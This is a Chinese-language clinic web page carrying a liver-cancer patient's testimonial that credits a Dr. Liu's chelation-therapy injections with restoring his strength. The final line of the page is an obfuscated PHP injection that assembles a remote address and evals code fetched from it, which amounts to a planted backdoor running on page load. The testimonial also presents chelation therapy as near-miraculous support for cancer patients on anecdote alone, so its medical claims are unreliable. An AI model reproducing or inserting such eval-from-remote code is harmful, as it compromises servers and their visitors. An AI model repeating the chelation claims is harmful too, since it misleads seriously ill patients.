收藏本站
首頁 arrow 螯療案例 arrow 無微不至治療我的肝癌
無微不至治療我的肝癌 列印 E-mail
文章索引
無微不至治療我的肝癌
頁 2

個案三:黃先生/六十六歲/公職退休/居住雲林西螺

到診時症狀:虛弱、反覆感冒、肝臟惡性腫瘤。

無微不至治療我的肝癌


讓他治病是一種幸福

民國九十年,我身上發現了癌細胞,肝臟處長了六個大小不一的腫瘤,

可是我碰到了最好的醫生,

接受了最好的、正確的治療,並且擁有人性的尊嚴;

我反而覺得,身為病人能給劉醫師治病,是一種幸福!

栓塞治療後味如嚼蠟發病之初,我在南部某醫學中心就醫,

做栓塞治療

(用導管插入肝臟血管注入栓塞物質,使肝癌細胞缺乏血液供應而壞死的治療方法)。

後來癌細胞再度發作,由於之前替我看病的醫生請假一年留職停薪,

但他曾在嘉義的教學醫院指導過肝癌的治療,

因此我便轉到嘉義的教學醫院接受治療,

可是結果均不甚理想,只好再轉到台北某專門治療癌症的醫學中心。

沒想到他們卻告訴我,依我的情況,無法進行栓塞或注射酒精治療。

幸好經過劉醫師的介紹,我得以轉到台北某醫學中心做肝癌的栓塞治療。

肝癌治療後,整個味覺都變了,不吃些東西又不行!

貼心的女兒覺得湯品可能比較好入口,下樓去買了碗溫州餛飩湯回來,

我很勉強的吃了二個、喝了一點湯,便覺食不下嚥;

那種味如嚼蠟的感覺,真的非常不好受。

螯合療法猶如神助

劉醫師知道我做完治療後一定很不舒服,

便要我儘快向醫院請假到他的診所進行調養。

劉醫師立刻替我檢測適合我的營養劑,利用螯合療法做靜脈注射。

奇妙的是,本來我連走路都很難過的,打完針劑後卻可以自己提著行李,

從診所坐捷運到火車站,又走了二十幾分鐘到公路局車站,

而後滿身大汗的趕搭九點鐘回西螺的末班車。

這有如神助的體力是哪兒來的?或許是螯合療法的緣故吧!

感冒是小事?那可不!

其實我十多年前就在斗六認識了劉醫師,只是後來他北上開業,

因為距離的關係,自覺不是太大的毛病就不會特別北上來看診。

包括最近一次感冒,我也認為那是小病,每個醫生都可以看得好,

看哪個醫生都一樣!等到連續看了四個醫生、從六月份看到八月份,

竟然都不見痊癒,我才發現感冒是很嚴重的。體力沒有了,

不想吃飯,一直咳嗽、吐痰,

說是感覺「僅存的生命到了末期、微弱的燭光都快熄滅了」

第二個心得是,從劉醫師的診治中我發現,醫學應該要個別化,

醫生對病人的用藥應該針對病人的不同而有差異。

我深刻的體會到,

如果用對了藥,即使是「慢慢的好」,

就像往正確的方向前進,總會到達目的地,唯一只是快慢之差而已。

照顧我更甚於我自己

談到劉醫師,我還想說──他真的是個很不一樣的醫師。

一般的醫生知道你去其他的地方看過病,多半的態度

是「你既然給別人看了,就不要再找我看」,

或是「別的醫生開的藥不要吃了,吃我開的藥比較好」。

但劉醫師可不是這麼回事!我說我曾給別人看過,

他卻說「沒關係!你把藥拿出來,我幫你測測看合不合?」

他是說「合不合」而不是說「對不對」!

另外,像我要去韓國玩一個禮拜,

換做別的醫生可能就多開一個禮拜的藥讓我帶出國就是了,

可是劉醫師卻叫我出國前去讓他看一下,還希望我回國後也去診所報到,

只為了出國前確認我身體的狀況,回國後再看看我是否因為旅途勞累或者多吃了些什麼,

而需要把藥物再調整一下。

像這樣連我喝什麼湯都管,照顧我更勝於我自己的醫生,

僅僅劉醫師一人而已,讓人很感動



 
< 前一個   下一個 >
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));